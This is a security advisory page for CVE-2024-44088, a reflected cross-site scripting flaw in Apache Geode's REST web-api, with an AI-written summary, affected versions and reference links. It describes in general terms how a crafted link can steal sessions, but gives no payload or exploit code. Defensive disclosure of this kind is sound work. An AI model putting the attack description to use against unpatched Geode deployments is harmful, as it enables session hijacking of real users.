Apache Geode: Reflected XSS
Description
Malicious script injection ('Cross-site Scripting') vulnerability in Apache Geode web-api (REST). This vulnerability allows an attacker that tricks a logged-in user into clicking a specially-crafted link to execute code on the returned page, which could lead to theft of the user's session information and even account takeover.
This issue affects Apache Geode: all versions prior to 1.15.2
Users are recommended to upgrade to version 1.15.2, which fixes the issue.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A reflected XSS vulnerability in Apache Geode's web-api (REST) allows an attacker to trick a logged-in user into executing malicious scripts, leading to session theft and account takeover.
Vulnerability
Overview
CVE-2024-44088 is a reflected cross-site scripting (XSS) vulnerability in the Apache Geode web-api (REST) component. The flaw allows an attacker to inject malicious scripts into a page returned by the server. The root cause is insufficient sanitization of user-supplied input in the REST API endpoints, enabling script injection when the input is reflected back in the HTTP response [2][3].
Exploitation
Prerequisites
To exploit this vulnerability, an attacker must trick a logged-in user into clicking a specially crafted link. The attack does not require authentication to the vulnerable endpoint itself, but the victim must have an active session with the Apache Geode web-api. The attack is performed over the network and requires user interaction [2][3].
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser. This can lead to theft of session cookies, enabling session hijacking and potential account takeover. The attacker could also perform actions on behalf of the victim within the Geode web interface [2][3].
Mitigation
The vulnerability affects all versions of Apache Geode prior to 1.15.2. Users are strongly recommended to upgrade to version 1.15.2, which contains the fix. No workarounds have been provided by the vendor [2][3].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.apache.geode:geode-web-apiMaven | >= 1.1.0, < 1.15.2 | 1.15.2 |
Affected products
2- Apache Software Foundation/Apache Geodev5Range: 1.1.0
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
4- github.com/advisories/GHSA-w595-4975-gm3hghsaADVISORY
- lists.apache.org/thread/161r34nokmcc0w74mnf04lskgb8g1d3gghsavendor-advisoryWEB
- nvd.nist.gov/vuln/detail/CVE-2024-44088ghsaADVISORY
- www.openwall.com/lists/oss-security/2025/10/14/5ghsaWEB
News mentions
0No linked articles in our index yet.